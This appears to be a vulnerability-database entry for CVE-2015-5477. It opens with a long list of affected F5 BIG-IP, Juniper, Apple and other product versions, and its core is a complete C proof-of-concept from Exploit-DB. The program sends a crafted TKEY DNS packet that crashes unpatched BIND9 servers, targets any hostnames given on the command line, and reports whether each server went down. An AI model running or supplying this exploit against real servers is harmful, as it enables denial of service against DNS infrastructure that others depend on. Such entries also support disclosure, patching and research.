vendor:f5model:big-ip webaccelerator hf3scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:eqversion:11.1

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:eqversion:11.0

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:eqversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:eqversion:10.1

Trust: 0.3

vendor:f5model:big-ip webaccelerator hf5scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip webaccelerator hf5scope:eqversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip webaccelerator hf7scope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip webaccelerator hf1scope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip psmscope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip psmscope:eqversion:11.3

Trust: 0.3

vendor:f5model:big-ip psmscope:eqversion:11.2

Trust: 0.3

vendor:f5model:big-ip psmscope:eqversion:11.1

Trust: 0.3

vendor:f5model:big-ip psmscope:eqversion:11.0

Trust: 0.3

vendor:f5model:big-ip psmscope:eqversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip psmscope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip psmscope:eqversion:10.0

Trust: 0.3

vendor:f5model:big-ip psm hf4scope:eqversion:11.3.0

Trust: 0.3

vendor:f5model:big-ip psm hf5scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip psm hf3scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip psm hf2scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip psm hf1scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip psmscope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip psm hf5scope:eqversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip psm hf3scope:eqversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip psm hf2scope:eqversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip psm hf7scope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip psm hf1scope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip psmscope:eqversion:10.1

Trust: 0.3

vendor:f5model:big-ip pemscope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip pemscope:eqversion:11.5

Trust: 0.3

vendor:f5model:big-ip pemscope:eqversion:11.3

Trust: 0.3

vendor:f5model:big-ip pemscope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip pemscope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip pem hf4scope:eqversion:11.3.0

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip ltm hf3scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip ltm hf3scope:eqversion:11.2

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.2

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.0

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:10.2.2

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip ltm hf4scope:eqversion:11.3.0

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.3.0

Trust: 0.3

vendor:f5model:big-ip ltm hf5scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip ltm hf2scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip ltm hf1scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip ltm hf5scope:eqversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip ltm hf2scope:eqversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip ltm hf7scope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:10.1.0

Trust: 0.3

vendor:f5model:big-ip link controller hf4scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.5.2

Trust: 0.3

vendor:f5model:big-ip link controller hf8scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip link controller hf7scope:eqversion:11.5

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.5

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.3

Trust: 0.3

vendor:f5model:big-ip link controller hf3scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip link controller hf3scope:eqversion:11.2

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.1

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.0

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:10.2.2

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:10.1

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:10.0.1

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip link controller hf4scope:eqversion:11.3.0

Trust: 0.3

vendor:f5model:big-ip link controller hf5scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip link controller hf2scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip link controller hf1scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip link controller hf5scope:eqversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip link controller hf2scope:eqversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip link controller 11.1.0-hf3scope: - version: -

Trust: 0.3

vendor:f5model:big-ip link controller 11.1.0-hf2scope: - version: -

Trust: 0.3

vendor:f5model:big-ip link controller hf7scope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip gtmscope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip gtmscope:eqversion:11.5

Trust: 0.3

vendor:f5model:big-ip gtmscope:eqversion:11.3

Trust: 0.3

vendor:f5model:big-ip gtm hf3scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip gtmscope:eqversion:11.2

Trust: 0.3

vendor:f5model:big-ip gtmscope:eqversion:11.0

Trust: 0.3

vendor:f5model:big-ip gtmscope:eqversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip gtmscope:eqversion:10.2.2

Trust: 0.3

vendor:f5model:big-ip gtmscope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip gtmscope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip gtmscope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip gtm hf4scope:eqversion:11.3.0

Trust: 0.3

vendor:f5model:big-ip gtm hf5scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip gtm hf2scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip gtm hf1scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip gtmscope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip gtm hf5scope:eqversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip gtm hf3scope:eqversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip gtm hf2scope:eqversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip gtm hf7scope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip gtmscope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip gtmscope:eqversion:10.1.0

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:11.3

Trust: 0.3

vendor:f5model:big-ip edge gateway hf3scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip edge gateway hf3scope:eqversion:11.2

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:11.2

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:11.1

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:11.0

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:10.2.3

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:10.2.2

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:10.2

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:10.0.1

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:10.0

Trust: 0.3

vendor:f5model:big-ip edge gateway hf5scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip edge gateway hf2scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip edge gateway hf5scope:eqversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip edge gateway 11.1.0-hf3scope: - version: -

Trust: 0.3

vendor:f5model:big-ip edge gateway 11.1.0-hf2scope: - version: -

Trust: 0.3

vendor:f5model:big-ip edge gateway 11.0.0-hf2scope: - version: -

Trust: 0.3

vendor:f5model:big-ip edge gateway 10.2.3-hf1scope: - version: -

Trust: 0.3

vendor:f5model:big-ip edge gateway hf1scope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:10.1.0

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:10.1

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.5

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.0

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:10.2.2

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:10.0

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip asm hf4scope:eqversion:11.3.0

Trust: 0.3

vendor:f5model:big-ip asm hf5scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip asm hf3scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip asm hf2scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip asm hf1scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip asm hf5scope:eqversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip asm hf3scope:eqversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip asm hf2scope:eqversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip asm hf7scope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:10.1.0

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.2

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.0

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:10.2.2

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.5.0

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.4.0

Trust: 0.3

vendor:f5model:big-ip apm hf4scope:eqversion:11.3.0

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.3.0

Trust: 0.3

vendor:f5model:big-ip apm hf5scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip apm hf3scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip apm hf2scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip apm hf1scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip apm hf5scope:eqversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip apm hf3scope:eqversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip apm hf2scope:eqversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip apm hf7scope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip apm hf1scope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:10.1

Trust: 0.3

vendor:f5model:big-ip analytics hf4scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.5.2

Trust: 0.3

vendor:f5model:big-ip analytics hf8scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip analytics hf7scope:eqversion:11.5

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.5

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.3

Trust: 0.3

vendor:f5model:big-ip analytics hf3scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip analytics hf3scope:eqversion:11.2

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.2

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip analytics hf4scope:eqversion:11.3.0

Trust: 0.3

vendor:f5model:big-ip analytics hf5scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip analytics hf2scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip analytics hf1scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip analytics hf5scope:eqversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip analytics hf2scope:eqversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip analytics hf7scope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip analytics 11.0.0-hf2scope: - version: -

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.0.0

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:11.5

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:11.3

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip afm hf4scope:eqversion:11.3.0

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:11.5

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:11.4.0

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x4.1

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.10.5

Trust: 0.3

vendor:junipermodel:junos os 15.1x49-d30scope:neversion: -

Trust: 0.3

vendor:junipermodel:junos os 12.1x47-d30scope:neversion: -

Trust: 0.3

vendor:junipermodel:junos 15.2r1scope:neversion: -

Trust: 0.3

vendor:junipermodel:junos 15.1x53-d20scope:neversion: -

Trust: 0.3

vendor:junipermodel:junos 15.1r3scope:neversion: -

Trust: 0.3

vendor:junipermodel:junos 15.1r2scope:neversion: -

Trust: 0.3

vendor:junipermodel:junos 15.1f3scope:neversion: -

Trust: 0.3

vendor:junipermodel:junos 14.2r5scope:neversion: -

Trust: 0.3

vendor:junipermodel:junos 14.1x53-d30scope:neversion: -

Trust: 0.3

vendor:junipermodel:junos 14.1r7scope:neversion: -

Trust: 0.3

vendor:junipermodel:junos 14.1r6scope:neversion: -

Trust: 0.3

vendor:junipermodel:junos 13.3r8scope:neversion: -

Trust: 0.3

vendor:junipermodel:junos 13.2x51-d40scope:neversion: -

Trust: 0.3

vendor:junipermodel:junos 13.2x51-d39scope:neversion: -

Trust: 0.3

vendor:junipermodel:junos 13.2r9scope:neversion: -

Trust: 0.3

vendor:junipermodel:junos 12.3x50-d50scope:neversion: -

Trust: 0.3

vendor:junipermodel:junos 12.3r12scope:neversion: -

Trust: 0.3

vendor:junipermodel:junos 12.3r11scope:neversion: -

Trust: 0.3

vendor:junipermodel:junos 12.1x46-d45scope:neversion: -

Trust: 0.3

vendor:junipermodel:junos 12.1x46-d40scope:neversion: -

Trust: 0.3

vendor:junipermodel:junos 12.1x44-d55scope:neversion: -

Trust: 0.3

vendor:ibmmodel:netezza host managementscope:neversion:5.3.8.0

Trust: 0.3

vendor:hpmodel:vcxscope:neversion:9.8.18

Trust: 0.3

vendor:hpmodel:hp-ux c.9.7.3.8.0scope:neversion: -

Trust: 0.3

vendor:applemodel:mac os serverscope:neversion:x4.1.5

Trust: 0.3

sources: BID: 74640 // BID: 76092 // PACKETSTORM: 132926 // EXPLOIT-DB: 37721 // EDBNET: 58904 // EDBNET: 23565

EXPLOIT

/*
PoC for BIND9 TKEY assert Dos (CVE-2015-5477)

Usage:
tkill <hostname>

What it does:
- First sends a "version" query to see if the server is up.
- Regardless of the version response, it then sends the DoS packet.
- Then it waits 5 seconds for a response. If the server crashes,
there will be no response.

Notes:
- multiple hostnames can be specified on the command-line
- IP addresses can be specified instead of hostnames
- supports IPv4 and IPv6
- runs on Linux, Mac, and Windows (cygwin or VisualStudio)
- if a hostname resolves to more than one IP, then all IPs
will be probed

About the vuln:
For control information, the "TSIG" feature allows packets to be
signed with a password. This allows slave servers to get updates
from master servers without a MitM attack (like from the NSA)
changing the data on the network.

A password can be distributed out of band, such as SSHing into
a box and editing the configuration file. Anther way is through
public-keys. That's the "TKEY" feature: it distributes new
TSIG passwords using public-keys.

When processing a TKEY packet, the code will call a function to
fetch the proper TKEY record. It looks in two places: the
"answer records" section, and the "additional records" section.
If it can't find it in the "additional", it looks in "answer".

The lookup function takes a parameter that is initially set
to NULL. During the failed lookup in the "additional" section,
it may set that parameter to a non-null value. Since a non-null
value is passed in again during the second lookup in the "answer"
section, the code crashes.

The patch was to set the variable to NULL before the second lookup.

The correct fix would simply not check to see if the parameter
was NULL to be begin with. It's an out-only parameter, so it's value
on input doesn't matter.

This is a just a "brainfart" bug that can only result in a crash
of the server. It cann't result in data-corruption or code
execution.

About this code:
To learn about writing network code, this is probably something useful
to study.

It works on both Windows and Unix (Linux, Mac, etc.). You can see where
the differences are between the two platforms, as well as the simularities.

It works on both IPv4 and IPv6. However, if you search through the code,
you'll find nothing that specifically references either version. It's
magically dual-stack. That's because it uses new functions like
"getaddrinfo()" instead of old functions like "gethostbyname()".

*/
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#ifdef WIN32
#include <winsock2.h>
#include <ws2tcpip.h>
#pragma comment(lib, "Ws2_32.lib")
#define WSA(err) (WSA##err)
#define WSAEAGAIN WSAETIMEDOUT
#else
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <errno.h>
#define WSAGetLastError() (errno)
#define WSA(err) (err)
#define closesocket(fd) close(fd)
#endif

/*
* DoS packet that will crash server
*/
static const unsigned char dospacket[] = {
0x01, 0x02, /* xid */
0x01, 0x00, /* query */
0x00, 0x01, /* one question */
0x00, 0x00, /* no answer */
0x00, 0x00, /* no authorities */
0x00, 0x01, /* one additional: must be 'additional' section to work*/

/* Query name */
0x03, 'f', 'o', 'o', 0x03, 'b', 'a', 'r', 0x00,
0x00, 249, /* TKEY record type */
0x00, 255,

/* Additional record */
0x03, 'f', 'o', 'o', 0x03, 'b', 'a', 'r', 0x00, /* name: must be same as query */
0x00, 16, /* record type: must NOT be 249/TKEY */
0x00, 255,
0, 0, 0, 0,
0, 51,
50,
'h', 't', 't', 'p', 's', ':', '/', '/',
'g', 'i', 't', 'h', 'u', 'b', '.', 'c',
'o', 'm', '/', 'r', 'o', 'b', 'e', 'r',
't', 'd', 'a', 'v', 'i', 'd', 'g', 'r',
'a', 'h', 'a', 'm', '/', 'c', 'v', 'e',
'-', '2', '0', '1', '5', '-', '5', '4',
'7', '7'
};

/*
* Packet for querying the version of the server, to test if it's up
*/
static const unsigned char versionpacket[] = {
0x03, 0x04, /* xid */
0x01, 0x00, /* query */
0x00, 0x01, /* one question */
0x00, 0x00, /* no answer */
0x00, 0x00, /* no authorities */
0x00, 0x00, /* no additional */

/* Query name */
0x07, 'v', 'e', 'r', 's', 'i', 'o', 'n', 0x04, 'b', 'i', 'n', 'd', 0x00,
0x00, 16, /* TXT */
0x00, 3, /* CHOAS */
};

/*
* YOLO BIND version.bind query
*/
int query_version(int fd, const struct addrinfo *target)
{
int bytes_received;
int i;
struct sockaddr_storage from;
socklen_t sizeof_from = sizeof(from);
char hostname[256];
unsigned char buf[2048];
int result = 0;

/*
* Query version
*/
sendto(fd, (const char*)versionpacket, sizeof(versionpacket), 0,
target->ai_addr, target->ai_addrlen);

/*
* get response
*/
again:
bytes_received = recvfrom(fd, (char*)buf, sizeof(buf), 0, (struct sockaddr*)&from, &sizeof_from);
if (bytes_received <= 0 && WSAGetLastError() == WSA(EAGAIN)) {
fprintf(stderr, "[-] timed out getting version, trying again\n");
return 0;
} else if (bytes_received <= 0) {
fprintf(stderr, "[-] unknown error receiving response: %u\n", WSAGetLastError());
return 0;
}
getnameinfo((struct sockaddr*)&from, sizeof(from), hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);

/*
* parse response
*/
if (bytes_received < 12)
goto again;
if (buf[0] != versionpacket[0] && buf[1] != versionpacket[1])
goto again;
if ((buf[2]&0x80) != 0x80)
goto again;

/*
* Handle respoonse code
*/
switch (buf[3]&0x0F) {
case 0:
/* parse packet below */
break;
case 1:
fprintf(stderr, "[-] %s: FORMERR\n", hostname);
return 1;
case 2:
fprintf(stderr, "[-] %s: SRVFAIL\n", hostname);
return 1;
case 3:
fprintf(stderr, "[-] %s: NAMERR\n", hostname);
return 1;
case 4:
fprintf(stderr, "[-] %s: NOTIMPL\n", hostname);
return 1;
case 5:
fprintf(stderr, "[-] %s: REFUSED\n", hostname);
return 1;
default:
fprintf(stderr, "[-] %s: unknown error: %u\n", hostname, buf[3]);
return 1;
}

i = 12; /* skip header */

/*
* skip query name
*/
while (i < bytes_received) {
if (buf[i] == 0) {
i++;
break;
} else if ((buf[i] & 0xC0) == 0xC0) {
i += 2;
break;
} else {
i += buf[i] + 1;
}
}
i += 4;

/*
* process all answers
*/
while (i + 12 <= bytes_received) {
int t, c, len;

/* skip answer name */
while (i < bytes_received) {
if (buf[i] == 0) {
i++;
break;
} else if ((buf[i] & 0xC0) == 0xC0) {
i += 2;
break;
} else {
i += buf[i] + 1;
}
}

/* extract resource-recorder header */
if (i + 10 > bytes_received)
break;
t = buf[i+0]<<8 | buf[i+1];
c = buf[i+2]<<8 | buf[i+3];
len = buf[i+8]<<8 | buf[i+9];
i += 10;

/* verify TXT CHAOS */
if (t != 16 || c != 3) {
i += len;
continue;
}

/* fix len */
if (len > bytes_received - i)
len = bytes_received - i;

/* print the hostname */
fprintf(stderr, "[+] %s: ", hostname);

/* print the strings */
{
int j = i;

i += len;

while (j < i) {
int len2 = buf[j];
int k;
j++;
if (len2 > bytes_received - len2)
len2 = bytes_received - len2;
fprintf(stderr, "\"");

for (k=j; k<j+len2; k++) {
if (buf[k] == '\\')
fprintf(stderr, "\\");
else if (!isprint(buf[k]))
fprintf(stderr, "\\x%02x", buf[k]);
else
fprintf(stderr, "%c", buf[k]);
}

j = k;

fprintf(stderr, "\" ");
}
fprintf(stderr, "\n");
}
result = 1;
}
return result;
}

/*
* Send the DoS packet
*/
void probe(const struct addrinfo *target)
{
int fd;
int x;
int i;
char hostname[256];
char buf[2048];
struct sockaddr_storage from;
socklen_t sizeof_from = sizeof(from);


/*
* Print status
*/
getnameinfo(target->ai_addr, target->ai_addrlen, hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);
fprintf(stderr, "[+] %s: Probing...\n", hostname);

/*
* Create a socket
*/
fd = socket(target->ai_family, SOCK_DGRAM, 0);
if (fd <= 0) {
fprintf(stderr, "[-] failed: socket(): %u\n", WSAGetLastError());
return;
}

/*
* Set the timeout to 5-seconds
*/
{
#ifdef WIN32
int milliseconds = 5000;
x = setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, (char*)&milliseconds, sizeof(milliseconds));
#else
struct timeval t;
t.tv_sec = 5;
t.tv_usec = 0;
x = setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, (char*)&t, sizeof(t));
#endif

if (x != 0) {
fprintf(stderr, "[-] err setting recv timeout: %u\n", WSAGetLastError());
}
}

/*
* First, query the server to grab its version, but also to see it's up
*/
fprintf(stderr, "[+] Querying version...\n");
for (i=0; i<3; i++) {
if (query_version(fd, target))
break;
if (i == 2) {
fprintf(stderr, "[-] Can't query server, is it crashed already?\n");
fprintf(stderr, "[-] Sending exploit anyway.\n");
}
}

/*****************
* SEND DoS PACKET
*****************/
fprintf(stderr, "[+] Sending DoS packet...\n");
sendto(fd, (const char*)dospacket, sizeof(dospacket), 0, target->ai_addr, target->ai_addrlen);

/* Grab response */
fprintf(stderr, "[+] Waiting 5-sec for response...\n");
for (;;) {
x = recvfrom(fd, (char*)buf, sizeof(buf), 0, (struct sockaddr*)&from, &sizeof_from);
if (x <= 0 && WSAGetLastError() == WSA(EAGAIN)) {
fprintf(stderr, "[+] timed out, probably crashed\n");
break;
} else if (x <= 0) {
fprintf(stderr, "[-] unknown error receiving response: %u\n", WSAGetLastError());
break;;
}

if (x > 2 && (buf[0] != dospacket[0] || buf[1] != dospacket[1]))
continue;

getnameinfo((struct sockaddr*)&from, sizeof(from), hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);
fprintf(stderr, "[-] %s: got response, so probably not vulnerable\n", hostname);
break;
}

closesocket(fd);
}

/*
* The main function just parses the arguments and looks up IP addrsses
* before calling the "probe" function to actually exploit the targets
*/
int main(int argc, char *argv[])
{
int i;

#ifdef WIN32
{WSADATA x; WSAStartup(0x101, &x);}
#endif

fprintf(stderr, "--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---\n");

if (argc <= 1) {
fprintf(stderr, "[-] no host specified\n");
fprintf(stderr, "usage:\n tkill <hostname>\n");
return -1;
}

/*
* Query all targets specified on the command line
*/
for (i=1; i<argc; i++) {
const char *hostname = argv[i];
struct addrinfo *info;
struct addrinfo *target;
char oldtarget[256] = "";
int x;

/*
* Lookup the name of the target
*/
fprintf(stderr, "[+] %s: Resolving to IP address\n", hostname);
x = getaddrinfo(hostname, "53", 0, &info);
if (x != 0) {
fprintf(stderr, "[-] %s: failed: %s\n", hostname, gai_strerror(x));
continue;
}

if (info->ai_next) {
fprintf(stderr, "[+] %s: Resolved to multiple IPs (NOTE)\n", hostname);
}

/*
* Since a name can return multiple IP addresses,
* send a probe to all the results
*/
for (target=info; target; target = target->ai_next) {
char newtarget[256];

/* bah, stupid bug in Linux gets the same target multiple
* times */
getnameinfo(target->ai_addr, target->ai_addrlen, newtarget, sizeof(newtarget), NULL, 0, NI_NUMERICHOST);
if (strcmp(newtarget, oldtarget) == 0)
continue;
memcpy(oldtarget, newtarget, sizeof(oldtarget));

probe(target);
printf("\n");
}

/*
* Cleanup
*/
freeaddrinfo(info);
}

return 0;
}

Trust: 1.0

sources: EXPLOIT-DB: 37721

EXPLOIT LANGUAGE

c

Trust: 0.6

sources: EXPLOIT-DB: 37721

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 37721

TYPE

TKEY (PoC)

Trust: 1.0

sources: EXPLOIT-DB: 37721

TAGS

tag:exploit

Trust: 0.5

tag:remote

Trust: 0.5

tag:denial of service

Trust: 0.5

tag:proof of concept

Trust: 0.5

sources: PACKETSTORM: 132926

CREDITS

Errata Security

Trust: 0.6

sources: EXPLOIT-DB: 37721

EXTERNAL IDS

db:NVDid:CVE-2015-5477

Trust: 4.8

db:EXPLOIT-DBid:37721

Trust: 1.6

db:ISCid:AA-01272

Trust: 1.1

db:JUNIPERid:JSA10783

Trust: 0.6

db:EDBNETid:58904

Trust: 0.6

db:EDBNETid:81117

Trust: 0.6

db:EDBNETid:81124

Trust: 0.6

db:0DAYTODAYid:23948

